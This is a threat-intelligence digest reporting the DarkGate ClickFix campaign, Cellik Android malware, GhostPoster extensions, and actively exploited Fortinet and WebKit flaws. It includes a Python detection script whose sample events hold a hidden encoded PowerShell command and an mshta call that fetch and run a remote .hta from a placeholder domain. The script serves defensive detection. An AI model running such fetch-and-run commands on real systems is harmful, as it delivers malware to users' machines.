Cyware Daily Threat Intelligence, December 17, 2025

Fixing a computer glitch is a natural instinct, but a new campaign is turning that helpful impulse into a liability. Attackers are exploiting a fake "Word Online" extension error to trick users into installing the DarkGate malware. Using the "ClickFix" social engineering technique, the campaign persuades victims to run malicious commands disguised as troubleshooting steps.
A new Android malware-as-a-service (MaaS) offering called Cellik allows criminals to create trojanized versions of legitimate Google Play Store apps. Because the malware retains the original app's interface and functionality, it is nearly impossible for users to detect the infection while it secretly captures screens and steals credentials in the background.
A feature often enabled by default has become a critical open door for attackers. Threat actors are actively exploiting two maximum-severity flaws in Fortinet FortiGate devices that allow for unauthenticated login bypass via the FortiCloud SSO feature. Attackers are already using these vulnerabilities to compromise admin accounts and export sensitive device configurations.
Top Malware Reported in the Last 24 Hours
ClickFix attack spreads DarkGate malware
A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data.
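The chain above (user-run command, encoded PowerShell, a remote .hta fetched for mshta) is visible in process-creation telemetry. The following is an added detection example written for this digest, not code from Cyware or from the campaign; it assumes a constructed event format with parent image, image and command line, and it uses the reserved placeholder domain example.invalid, so only the file name dark.hta comes from the report.

```python
"""Triage constructed process-creation events for the ClickFix -> mshta/.hta chain.
The event layout and all sample values below are constructed for this example."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # process that launched it, e.g. explorer.exe (Run dialog) or a browser
    image: str          # process launched
    command_line: str


# Remote .hta reference in a command line (what mshta would be asked to fetch).
HTA_URL = re.compile(r"https?://[^\s\"']+\.hta\b", re.IGNORECASE)
# PowerShell's -e / -ec / -enc / -EncodedCommand switch followed by base64.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Parents that indicate the user, not an admin tool, launched the shell.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument (UTF-16LE base64), or ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event matches the ClickFix chain (empty = benign)."""
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    visible = ev.command_line
    hidden = decode_encoded_command(ev.command_line)
    reasons = []
    if image == "mshta.exe" and HTA_URL.search(visible):
        reasons.append("mshta launched with remote .hta")
    if image == "powershell.exe":
        if hidden:
            reasons.append("encoded PowerShell command")
        text = visible + " " + hidden
        if HTA_URL.search(text) or "mshta" in text.lower():
            reasons.append("PowerShell references mshta/.hta")
    if reasons and parent in USER_LAUNCHERS:
        reasons.append(f"spawned from user-facing parent {parent}")
    return reasons


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; example.invalid is a reserved placeholder domain.
SAMPLE_EVENTS = [
    # user pasted the "fix" into the Run dialog: encoded PowerShell hiding the mshta call
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -w hidden -enc " + _encode_ps("mshta http://example.invalid/dark.hta")),
    # mshta started with the remote HTA in the clear
    ProcEvent("powershell.exe", "mshta.exe", "mshta.exe http://example.invalid/dark.hta"),
    # benign admin script, must not be flagged
    ProcEvent("cmd.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.image, "->", triage(ev) or "clean")
```

Decoding the encoded command before matching is the part that matters: the visible command line of the first event contains neither "mshta" nor ".hta", so a rule that only inspects raw command lines would miss it.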
Cellik malware targets Google Play apps
Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures.
GhostPoster campaign targets Firefox extensions
A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud.
Top Vulnerabilities Reported in the Last 24 Hours
Newly disclosed Fortinet bugs under attack
Threat actors are actively exploiting two critical security flaws in Fortinet FortiGate devices, identified as CVE-2025-59718 and CVE-2025-59719, each with a CVSS score of 9.8. These vulnerabilities allow for unauthenticated SSO login authentication bypass through crafted SAML messages, particularly when the FortiCloud SSO feature is enabled. Arctic Wolf reported observing malicious activity involving SSO logins on December 12, with attackers using specific IP addresses to compromise the "admin" account and export device configurations. While FortiCloud SSO is typically disabled by default, it is automatically enabled during FortiCare registration unless explicitly turned off. The ongoing campaign is still in its early stages, with a limited number of networks affected, and the nature of the threat appears opportunistic. CISA has added one of the vulnerabilities to its Known Exploited Vulnerabilities catalog.
CISA adds Apple WebKit 0-day to KEV catalog
CISA has identified a critical zero-day vulnerability (CVE-2025-43529) in Apple’s WebKit rendering engine, which is actively being exploited in the wild. This severe use-after-free vulnerability affects multiple Apple platforms, including iOS, iPadOS, and macOS, as well as third-party applications that utilize WebKit for HTML processing. When users visit maliciously crafted web pages, attackers can exploit this flaw to trigger memory corruption, allowing them to execute arbitrary code with the privileges of the affected application.